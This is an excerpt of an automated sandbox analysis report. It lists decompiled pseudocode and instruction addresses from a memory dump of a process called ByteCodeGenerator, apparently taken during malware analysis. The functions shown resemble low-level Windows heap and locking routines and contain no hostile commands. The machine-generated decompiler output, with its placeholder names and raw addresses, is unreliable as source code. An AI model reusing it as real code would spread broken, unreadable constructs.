                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9d2f50758f70ff5cafb89ab35adaac1d9580e437af7b89201b902125c9e902e9
                                  • Instruction ID: 8b78b2380538c3be3e15978c093b2f94b8c9ef6ce4c4191fa1c0eae8bc17607a
                                  • Opcode Fuzzy Hash: 9d2f50758f70ff5cafb89ab35adaac1d9580e437af7b89201b902125c9e902e9
                                  • Instruction Fuzzy Hash: 06318C75A14249AFD704DF29D840B9ABBE4FB09210F14826AF914CF342D631E980CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0345BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				void* __ebx;
                                  				void* __edi;
                                  				intOrPtr _t22;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t51;
                                  
                                  				_t51 =  *0x3516100; // 0x5
                                  				_v12 = __edx;
                                  				_v8 = __ecx;
                                  				if(_t51 >= 0x800) {
                                  					L12:
                                  					return 0;
                                  				} else {
                                  					goto L1;
                                  				}
                                  				while(1) {
                                  					L1:
                                  					_t22 = _t51;
                                  					asm("lock cmpxchg [ecx], edx");
                                  					if(_t51 == _t22) {
                                  						break;
                                  					}
                                  					_t51 = _t22;
                                  					if(_t22 < 0x800) {
                                  						continue;
                                  					}
                                  					goto L12;
                                  				}
                                  				E03442280(0xd, 0x1096f1a0);
                                  				_t41 =  *0x35160f8; // 0x0
                                  				if(_t41 != 0) {
                                  					 *0x35160f8 =  *_t41;
                                  					 *0x35160fc =  *0x35160fc + 0xffff;
                                  				}
                                  				E0343FFB0(_t41, 0x800, 0x1096f1a0);
                                  				if(_t41 != 0) {
                                  					L6:
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                  					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                  					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                  					do {
                                  						asm("lock xadd [0x35160f0], ax");
                                  						 *((short*)(_t41 + 0x34)) = 1;
                                  					} while (1 == 0);
                                  					goto L8;
                                  				} else {
                                  					_t41 = L03444620(0x3516100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                  					if(_t41 == 0) {
                                  						L11:
                                  						asm("lock dec dword [0x3516100]");
                                  						L8:
                                  						return _t41;
                                  					}
                                  					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                  					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                  					if(_t41 == 0) {
                                  						goto L11;
                                  					}
                                  					goto L6;
                                  				}
                                  			}










                                  0x0345bc36
                                  0x0345bc42
                                  0x0345bc45
                                  0x0345bc4a
                                  0x0345bd35
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0345bc50
                                  0x0345bc50
                                  0x0345bc58
                                  0x0345bc5a
                                  0x0345bc60
                                  0x00000000
                                  0x00000000
                                  0x0349a4f2
                                  0x0349a4f6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0349a4fc
                                  0x0345bc79
                                  0x0345bc7e
                                  0x0345bc86
                                  0x0345bd16
                                  0x0345bd20
                                  0x0345bd20
                                  0x0345bc8d
                                  0x0345bc94
                                  0x0345bcbd
                                  0x0345bcca
                                  0x0345bccb
                                  0x0345bccc
                                  0x0345bccd
                                  0x0345bcce
                                  0x0345bcd4
                                  0x0345bcea
                                  0x0345bcee
                                  0x0345bcf2
                                  0x0345bd00
                                  0x0345bd04
                                  0x00000000
                                  0x0345bc96
                                  0x0345bcab
                                  0x0345bcaf
                                  0x0345bd2c
                                  0x0345bd2c
                                  0x0345bd09
                                  0x00000000
                                  0x0345bd09
                                  0x0345bcb1
                                  0x0345bcb5
                                  0x0345bcbb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0345bcbb

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ca57c8d5f27d15bac5c0421e1b5e1c382e0d7911d8c33c37e95da139a4af1294
                                  • Instruction ID: 4ce8f4c0a2d12ba3b381050273cf722c74a890fddd432380d3dced5d3e8e1e07
                                  • Opcode Fuzzy Hash: ca57c8d5f27d15bac5c0421e1b5e1c382e0d7911d8c33c37e95da139a4af1294
                                  • Instruction Fuzzy Hash: F331F536A006569FDB11EF58D480BA673A4FF18311F0540BAED44DF316E778DA0ACB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E03429100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                  				signed int _t53;
                                  				signed int _t56;
                                  				signed int* _t60;
                                  				signed int _t63;
                                  				signed int _t66;
                                  				signed int _t69;
                                  				void* _t70;
                                  				intOrPtr* _t72;
                                  				void* _t78;
                                  				void* _t79;
                                  				signed int _t80;
                                  				intOrPtr _t82;
                                  				void* _t85;
                                  				void* _t88;
                                  				void* _t89;
                                  
                                  				_t84 = __esi;
                                  				_t70 = __ecx;
                                  				_t68 = __ebx;
                                  				_push(0x2c);
                                  				_push(0x34ff6e8);
                                  				E0347D0E8(__ebx, __edi, __esi);
                                  				 *((char*)(_t85 - 0x1d)) = 0;
                                  				_t82 =  *((intOrPtr*)(_t85 + 8));
                                  				if(_t82 == 0) {
                                  					L4:
                                  					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                  						E034F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                  					}
                                  					L5:
                                  					return E0347D130(_t68, _t82, _t84);
                                  				}
                                  				_t88 = _t82 -  *0x35186c0; // 0xca07b0
                                  				if(_t88 == 0) {
                                  					goto L4;
                                  				}
                                  				_t89 = _t82 -  *0x35186b8; // 0x0
                                  				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                  					goto L4;
                                  				} else {
                                  					E03442280(_t82 + 0xe0, _t82 + 0xe0);
                                  					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                  					__eflags =  *((char*)(_t82 + 0xe5));
                                  					if(__eflags != 0) {
                                  						E034F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                  						goto L12;
                                  					} else {
                                  						__eflags =  *((char*)(_t82 + 0xe4));
                                  						if( *((char*)(_t82 + 0xe4)) == 0) {
                                  							 *((char*)(_t82 + 0xe4)) = 1;
                                  							_push(_t82);
                                  							_push( *((intOrPtr*)(_t82 + 0x24)));
                                  							E0346AFD0();
                                  						}
                                  						while(1) {
                                  							_t60 = _t82 + 8;
                                  							 *(_t85 - 0x2c) = _t60;
                                  							_t68 =  *_t60;
                                  							_t80 = _t60[1];
                                  							 *(_t85 - 0x28) = _t68;
                                  							 *(_t85 - 0x24) = _t80;
                                  							while(1) {
                                  								L10:
                                  								__eflags = _t80;
                                  								if(_t80 == 0) {
                                  									break;
                                  								}
                                  								_t84 = _t68;
                                  								 *(_t85 - 0x30) = _t80;
                                  								 *(_t85 - 0x24) = _t80 - 1;
                                  								asm("lock cmpxchg8b [edi]");
                                  								_t68 = _t84;
                                  								 *(_t85 - 0x28) = _t68;
                                  								 *(_t85 - 0x24) = _t80;
                                  								__eflags = _t68 - _t84;
                                  								_t82 =  *((intOrPtr*)(_t85 + 8));
                                  								if(_t68 != _t84) {
                                  									continue;
                                  								}
                                  								__eflags = _t80 -  *(_t85 - 0x30);
                                  								if(_t80 !=  *(_t85 - 0x30)) {
                                  									continue;
                                  								}
                                  								__eflags = _t80;
                                  								if(_t80 == 0) {
                                  									break;
                                  								}
                                  								_t63 = 0;
                                  								 *(_t85 - 0x34) = 0;
                                  								_t84 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									 *(_t85 - 0x3c) = _t84;
                                  									__eflags = _t84 - 3;
                                  									if(_t84 >= 3) {
                                  										break;
                                  									}
                                  									__eflags = _t63;
                                  									if(_t63 != 0) {
                                  										L40:
                                  										_t84 =  *_t63;
                                  										__eflags = _t84;
                                  										if(_t84 != 0) {
                                  											_t84 =  *(_t84 + 4);
                                  											__eflags = _t84;
                                  											if(_t84 != 0) {
                                  												 *0x351b1e0(_t63, _t82);
                                  												 *_t84();
                                  											}
                                  										}
                                  										do {
                                  											_t60 = _t82 + 8;
                                  											 *(_t85 - 0x2c) = _t60;
                                  											_t68 =  *_t60;
                                  											_t80 = _t60[1];
                                  											 *(_t85 - 0x28) = _t68;
                                  											 *(_t85 - 0x24) = _t80;
                                  											goto L10;
                                  										} while (_t63 == 0);
                                  										goto L40;
                                  									}
                                  									_t69 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										 *(_t85 - 0x38) = _t69;
                                  										__eflags = _t69 -  *0x35184c0;
                                  										if(_t69 >=  *0x35184c0) {
                                  											break;
                                  										}
                                  										__eflags = _t63;
                                  										if(_t63 != 0) {
                                  											break;
                                  										}
                                  										_t66 = E034F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                  										__eflags = _t66;
                                  										if(_t66 == 0) {
                                  											_t63 = 0;
                                  											__eflags = 0;
                                  										} else {
                                  											_t63 = _t66 + 0xfffffff4;
                                  										}
                                  										 *(_t85 - 0x34) = _t63;
                                  										_t69 = _t69 + 1;
                                  									}
                                  									_t84 = _t84 + 1;
                                  								}
                                  								__eflags = _t63;
                                  							}
                                  							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                  							 *((char*)(_t82 + 0xe5)) = 1;
                                  							 *((char*)(_t85 - 0x1d)) = 1;
                                  							L12:
                                  							 *(_t85 - 4) = 0xfffffffe;
                                  							E0342922A(_t82);
                                  							_t53 = E03447D50();
                                  							__eflags = _t53;
                                  							if(_t53 != 0) {
                                  								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  							} else {
                                  								_t56 = 0x7ffe0386;
                                  							}
                                  							__eflags =  *_t56;
                                  							if( *_t56 != 0) {
                                  								_t56 = E034F8B58(_t82);
                                  							}
                                  							__eflags =  *((char*)(_t85 - 0x1d));
                                  							if( *((char*)(_t85 - 0x1d)) != 0) {
                                  								__eflags = _t82 -  *0x35186c0; // 0xca07b0
                                  								if(__eflags != 0) {
                                  									__eflags = _t82 -  *0x35186b8; // 0x0
                                  									if(__eflags == 0) {
                                  										_t79 = 0x35186bc;
                                  										_t72 = 0x35186b8;
                                  										goto L18;
                                  									}
                                  									__eflags = _t56 | 0xffffffff;
                                  									asm("lock xadd [edi], eax");
                                  									if(__eflags == 0) {
                                  										E03429240(_t68, _t82, _t82, _t84, __eflags);
                                  									}
                                  								} else {
                                  									_t79 = 0x35186c4;
                                  									_t72 = 0x35186c0;
                                  									L18:
                                  									E03459B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                  								}
                                  							}
                                  							goto L5;
                                  						}
                                  					}
                                  				}
                                  			}


















                                  0x03429100
                                  0x03429100
                                  0x03429100
                                  0x03429100
                                  0x03429102
                                  0x03429107
                                  0x0342910c
                                  0x03429110
                                  0x03429115
                                  0x03429136
                                  0x03429143
                                  0x034837e4
                                  0x034837e4
                                  0x03429149
                                  0x0342914e
                                  0x0342914e
                                  0x03429117
                                  0x0342911d
                                  0x00000000
                                  0x00000000
                                  0x0342911f
                                  0x03429125
                                  0x00000000
                                  0x03429151
                                  0x03429158
                                  0x0342915d
                                  0x03429161
                                  0x03429168
                                  0x03483715
                                  0x00000000
                                  0x0342916e
                                  0x0342916e
                                  0x03429175
                                  0x03429177
                                  0x0342917e
                                  0x0342917f
                                  0x03429182
                                  0x03429182
                                  0x03429187
                                  0x03429187
                                  0x0342918a
                                  0x0342918d
                                  0x0342918f
                                  0x03429192
                                  0x03429195
                                  0x03429198
                                  0x03429198
                                  0x03429198
                                  0x0342919a
                                  0x00000000
                                  0x00000000
                                  0x0348371f
                                  0x03483721
                                  0x03483727
                                  0x0348372f
                                  0x03483733
                                  0x03483735
                                  0x03483738
                                  0x0348373b
                                  0x0348373d
                                  0x03483740
                                  0x00000000
                                  0x00000000
                                  0x03483746
                                  0x03483749
                                  0x00000000
                                  0x00000000
                                  0x0348374f
                                  0x03483751
                                  0x00000000
                                  0x00000000
                                  0x03483757
                                  0x03483759
                                  0x0348375c
                                  0x0348375c
                                  0x0348375e
                                  0x0348375e
                                  0x03483761
                                  0x03483764
                                  0x00000000
                                  0x00000000
                                  0x03483766
                                  0x03483768
                                  0x034837a3
                                  0x034837a3
                                  0x034837a5
                                  0x034837a7
                                  0x034837ad
                                  0x034837b0
                                  0x034837b2
                                  0x034837bc
                                  0x034837c2
                                  0x034837c2
                                  0x034837b2
                                  0x03429187
                                  0x03429187
                                  0x0342918a
                                  0x0342918d
                                  0x0342918f
                                  0x03429192
                                  0x03429195
                                  0x00000000
                                  0x03429195
                                  0x00000000
                                  0x03429187
                                  0x0348376a
                                  0x0348376a
                                  0x0348376c
                                  0x0348376c
                                  0x0348376f
                                  0x03483775
                                  0x00000000
                                  0x00000000
                                  0x03483777
                                  0x03483779
                                  0x00000000
                                  0x00000000
                                  0x03483782
                                  0x03483787
                                  0x03483789
                                  0x03483790
                                  0x03483790
                                  0x0348378b
                                  0x0348378b
                                  0x0348378b
                                  0x03483792
                                  0x03483795
                                  0x03483795
                                  0x03483798
                                  0x03483798
                                  0x0348379b
                                  0x0348379b
                                  0x034291a3
                                  0x034291a9
                                  0x034291b0
                                  0x034291b4
                                  0x034291b4
                                  0x034291bb
                                  0x034291c0
                                  0x034291c5
                                  0x034291c7
                                  0x034837da
                                  0x034291cd
                                  0x034291cd
                                  0x034291cd
                                  0x034291d2
                                  0x034291d5
                                  0x03429239
                                  0x03429239
                                  0x034291d7
                                  0x034291db
                                  0x034291e1
                                  0x034291e7
                                  0x034291fd
                                  0x03429203
                                  0x0342921e
                                  0x03429223
                                  0x00000000
                                  0x03429223
                                  0x03429205
                                  0x03429208
                                  0x0342920c
                                  0x03429214
                                  0x03429214
                                  0x034291e9
                                  0x034291e9
                                  0x034291ee
                                  0x034291f3
                                  0x034291f3
                                  0x034291f3
                                  0x034291e7
                                  0x00000000
                                  0x034291db
                                  0x03429187
                                  0x03429168

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f4b3e7eecca1c02440bb91d79461cc10f310d2dbc3e5ffe281f2fca4dd820f8
                                  • Instruction ID: 627cf1631a20cce8f54bff172a7ab64f542764a6e45c29c4b70abd52eeb64d58
                                  • Opcode Fuzzy Hash: 1f4b3e7eecca1c02440bb91d79461cc10f310d2dbc3e5ffe281f2fca4dd820f8
                                  • Instruction Fuzzy Hash: 6B319079A002549FEB25DF6AC488BADBBB1BB49310F5C855BC4147F351C370A990CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E03451DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr* _v20;
                                  				void* _t22;
                                  				char _t23;
                                  				void* _t36;
                                  				intOrPtr _t42;
                                  				intOrPtr _t43;
                                  
                                  				_v12 = __ecx;
                                  				_t43 = 0;
                                  				_v20 = __edx;
                                  				_t42 =  *__edx;
                                  				 *__edx = 0;
                                  				_v16 = _t42;
                                  				_push( &_v8);
                                  				_push(0);
                                  				_push(0);
                                  				_push(6);
                                  				_push(0);
                                  				_push(__ecx);
                                  				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                  				_push(_t36);
                                  				_t22 = E0344F460();
                                  				if(_t22 < 0) {
                                  					if(_t22 == 0xc0000023) {
                                  						goto L1;
                                  					}
                                  					L3:
                                  					return _t43;
                                  				}
                                  				L1:
                                  				_t23 = _v8;
                                  				if(_t23 != 0) {
                                  					_t38 = _a4;
                                  					if(_t23 >  *_a4) {
                                  						_t42 = L03444620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                  						if(_t42 == 0) {
                                  							goto L3;
                                  						}
                                  						_t23 = _v8;
                                  					}
                                  					_push( &_v8);
                                  					_push(_t23);
                                  					_push(_t42);
                                  					_push(6);
                                  					_push(_t43);
                                  					_push(_v12);
                                  					_push(_t36);
                                  					if(E0344F460() < 0) {
                                  						if(_t42 != 0 && _t42 != _v16) {
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                  						}
                                  						goto L3;
                                  					}
                                  					 *_v20 = _t42;
                                  					 *_a4 = _v8;
                                  				}
                                  				_t43 = 1;
                                  				goto L3;
                                  			}












                                  0x03451dc2
                                  0x03451dc5
                                  0x03451dc7
                                  0x03451dcc
                                  0x03451dce
                                  0x03451dd6
                                  0x03451ddf
                                  0x03451de0
                                  0x03451de1
                                  0x03451de5
                                  0x03451de8
                                  0x03451def
                                  0x03451df0
                                  0x03451df6
                                  0x03451df7
                                  0x03451dfe
                                  0x03451e1a
                                  0x00000000
                                  0x00000000
                                  0x03451e0b
                                  0x03451e12
                                  0x03451e12
                                  0x03451e00
                                  0x03451e00
                                  0x03451e05
                                  0x03451e1e
                                  0x03451e23
                                  0x0349570f
                                  0x03495713
                                  0x00000000
                                  0x00000000
                                  0x03495719
                                  0x03495719
                                  0x03451e2c
                                  0x03451e2d
                                  0x03451e2e
                                  0x03451e2f
                                  0x03451e31
                                  0x03451e32
                                  0x03451e35
                                  0x03451e3d
                                  0x03495723
                                  0x0349573d
                                  0x0349573d
                                  0x00000000
                                  0x03495723
                                  0x03451e49
                                  0x03451e4e
                                  0x03451e4e
                                  0x03451e09
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                  • Instruction ID: c05af1ac4d573fb1ceda4810accb47783203b164f85fe073f24f04757b6abe59
                                  • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                  • Instruction Fuzzy Hash: 3F218D36A80218AFDB21CF59CC80FABFBB9EF85640F154066F9059F611D634AE01CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E03440050(void* __ecx) {
                                  				signed int _v8;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr* _t30;
                                  				intOrPtr* _t31;
                                  				signed int _t34;
                                  				void* _t40;
                                  				void* _t41;
                                  				signed int _t44;
                                  				intOrPtr _t47;
                                  				signed int _t58;
                                  				void* _t59;
                                  				void* _t61;
                                  				void* _t62;
                                  				signed int _t64;
                                  
                                  				_push(__ecx);
                                  				_v8 =  *0x351d360 ^ _t64;
                                  				_t61 = __ecx;
                                  				_t2 = _t61 + 0x20; // 0x20
                                  				E03459ED0(_t2, 1, 0);
                                  				_t52 =  *(_t61 + 0x8c);
                                  				_t4 = _t61 + 0x8c; // 0x8c
                                  				_t40 = _t4;
                                  				do {
                                  					_t44 = _t52;
                                  					_t58 = _t52 & 0x00000001;
                                  					_t24 = _t44;
                                  					asm("lock cmpxchg [ebx], edx");
                                  					_t52 = _t44;
                                  				} while (_t52 != _t44);
                                  				if(_t58 == 0) {
                                  					L7:
                                  					_pop(_t59);
                                  					_pop(_t62);
                                  					_pop(_t41);
                                  					return E0346B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                  				}
                                  				asm("lock xadd [esi], eax");
                                  				_t47 =  *[fs:0x18];
                                  				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                  				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                  				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                  				if(_t30 != 0) {
                                  					if( *_t30 == 0) {
                                  						goto L4;
                                  					}
                                  					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  					L5:
                                  					if( *_t31 != 0) {
                                  						_t18 = _t61 + 0x78; // 0x78
                                  						E034F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                  					}
                                  					_t52 =  *(_t61 + 0x5c);
                                  					_t11 = _t61 + 0x78; // 0x78
                                  					_t34 = E03459702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                  					_t24 = _t34 | 0xffffffff;
                                  					asm("lock xadd [esi], eax");
                                  					if((_t34 | 0xffffffff) == 0) {
                                  						 *0x351b1e0(_t61);
                                  						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                  					}
                                  					goto L7;
                                  				}
                                  				L4:
                                  				_t31 = 0x7ffe0386;
                                  				goto L5;
                                  			}




















                                  0x03440055
                                  0x0344005d
                                  0x03440062
                                  0x0344006c
                                  0x0344006f
                                  0x03440074
                                  0x0344007a
                                  0x0344007a
                                  0x03440080
                                  0x03440080
                                  0x03440087
                                  0x0344008d
                                  0x0344008f
                                  0x03440093
                                  0x03440095
                                  0x0344009b
                                  0x034400f8
                                  0x034400fb
                                  0x034400fc
                                  0x034400ff
                                  0x03440108
                                  0x03440108
                                  0x034400a2
                                  0x034400a6
                                  0x034400b3
                                  0x034400bc
                                  0x034400c5
                                  0x034400ca
                                  0x0348c01e
                                  0x00000000
                                  0x00000000
                                  0x0348c02d
                                  0x034400d5
                                  0x034400d9
                                  0x0348c03d
                                  0x0348c046
                                  0x0348c046
                                  0x034400df
                                  0x034400e2
                                  0x034400ea
                                  0x034400ef
                                  0x034400f2
                                  0x034400f6
                                  0x03440111
                                  0x03440117
                                  0x03440117
                                  0x00000000
                                  0x034400f6
                                  0x034400d0
                                  0x034400d0
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4baa5229733852d35b1431912dd0388a445487a252ad825525a6d75f24c052cb
                                  • Instruction ID: 967a2b891fd8bc79e7f5754c0436c0d3b0c1a7cf8404e86120ea709fe3120c84
                                  • Opcode Fuzzy Hash: 4baa5229733852d35b1431912dd0388a445487a252ad825525a6d75f24c052cb
                                  • Instruction Fuzzy Hash: 23317C31601B04DFD721DF28D840B5AF3E5FF89714F18856EE5968BB90DB75A802CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E034A6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                  				signed short* _v8;
                                  				signed char _v12;
                                  				void* _t22;
                                  				signed char* _t23;
                                  				intOrPtr _t24;
                                  				signed short* _t44;
                                  				void* _t47;
                                  				signed char* _t56;
                                  				signed char* _t58;
                                  
                                  				_t48 = __ecx;
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				_t44 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __ecx;
                                  				_t22 = E03447D50();
                                  				_t58 = 0x7ffe0384;
                                  				if(_t22 == 0) {
                                  					_t23 = 0x7ffe0384;
                                  				} else {
                                  					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  				}
                                  				if( *_t23 != 0) {
                                  					_t24 =  *0x3517b9c; // 0x0
                                  					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                  					_t23 = L03444620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                  					_t56 = _t23;
                                  					if(_t56 != 0) {
                                  						_t56[0x24] = _a4;
                                  						_t56[0x28] = _a8;
                                  						_t56[6] = 0x1420;
                                  						_t56[0x20] = _v12;
                                  						_t14 =  &(_t56[0x2c]); // 0x2c
                                  						E0346F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                  						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                  						if(E03447D50() != 0) {
                                  							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  						}
                                  						_push(_t56);
                                  						_push(_t47 - 0x20);
                                  						_push(0x402);
                                  						_push( *_t58 & 0x000000ff);
                                  						E03469AE0();
                                  						_t23 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                  					}
                                  				}
                                  				return _t23;
                                  			}












                                  0x034a6c0a
                                  0x034a6c0f
                                  0x034a6c10
                                  0x034a6c13
                                  0x034a6c15
                                  0x034a6c19
                                  0x034a6c1c
                                  0x034a6c21
                                  0x034a6c28
                                  0x034a6c3a
                                  0x034a6c2a
                                  0x034a6c33
                                  0x034a6c33
                                  0x034a6c3f
                                  0x034a6c48
                                  0x034a6c4d
                                  0x034a6c60
                                  0x034a6c65
                                  0x034a6c69
                                  0x034a6c73
                                  0x034a6c79
                                  0x034a6c7f
                                  0x034a6c86
                                  0x034a6c90
                                  0x034a6c94
                                  0x034a6ca6
                                  0x034a6cb2
                                  0x034a6cbd
                                  0x034a6cbd
                                  0x034a6cc3
                                  0x034a6cc7
                                  0x034a6ccb
                                  0x034a6cd0
                                  0x034a6cd1
                                  0x034a6ce2
                                  0x034a6ce2
                                  0x034a6c69
                                  0x034a6ced

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 28920804749d7e0611131740af3a333347e25c32f4e56e93fcf68933d1256c25
                                  • Instruction ID: fe39b57c4f4b3360067cb0e8ac4b29c21ac447f402486c3422381ace8fad1321
                                  • Opcode Fuzzy Hash: 28920804749d7e0611131740af3a333347e25c32f4e56e93fcf68933d1256c25
                                  • Instruction Fuzzy Hash: A1219AB5A00A44AFD711DF6DD880E6AB7A8FF48700F08006AF904CB790D738E911CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E034690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                  				intOrPtr* _v0;
                                  				void* _v8;
                                  				signed int _v12;
                                  				intOrPtr _v16;
                                  				char _v36;
                                  				void* _t38;
                                  				intOrPtr _t41;
                                  				void* _t44;
                                  				signed int _t45;
                                  				intOrPtr* _t49;
                                  				signed int _t57;
                                  				signed int _t58;
                                  				intOrPtr* _t59;
                                  				void* _t62;
                                  				void* _t63;
                                  				void* _t65;
                                  				void* _t66;
                                  				signed int _t69;
                                  				intOrPtr* _t70;
                                  				void* _t71;
                                  				intOrPtr* _t72;
                                  				intOrPtr* _t73;
                                  				char _t74;
                                  
                                  				_t65 = __edx;
                                  				_t57 = _a4;
                                  				_t32 = __ecx;
                                  				_v8 = __edx;
                                  				_t3 = _t32 + 0x14c; // 0x14c
                                  				_t70 = _t3;
                                  				_v16 = __ecx;
                                  				_t72 =  *_t70;
                                  				while(_t72 != _t70) {
                                  					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                  						L24:
                                  						_t72 =  *_t72;
                                  						continue;
                                  					}
                                  					_t30 = _t72 + 0x10; // 0x10
                                  					if(E0347D4F0(_t30, _t65, _t57) == _t57) {
                                  						return 0xb7;
                                  					}
                                  					_t65 = _v8;
                                  					goto L24;
                                  				}
                                  				_t61 = _t57;
                                  				_push( &_v12);
                                  				_t66 = 0x10;
                                  				if(E0345E5E0(_t57, _t66) < 0) {
                                  					return 0x216;
                                  				}
                                  				_t73 = L03444620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                  				if(_t73 == 0) {
                                  					_t38 = 0xe;
                                  					return _t38;
                                  				}
                                  				_t9 = _t73 + 0x10; // 0x10
                                  				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                  				E0346F3E0(_t9, _v8, _t57);
                                  				_t41 =  *_t70;
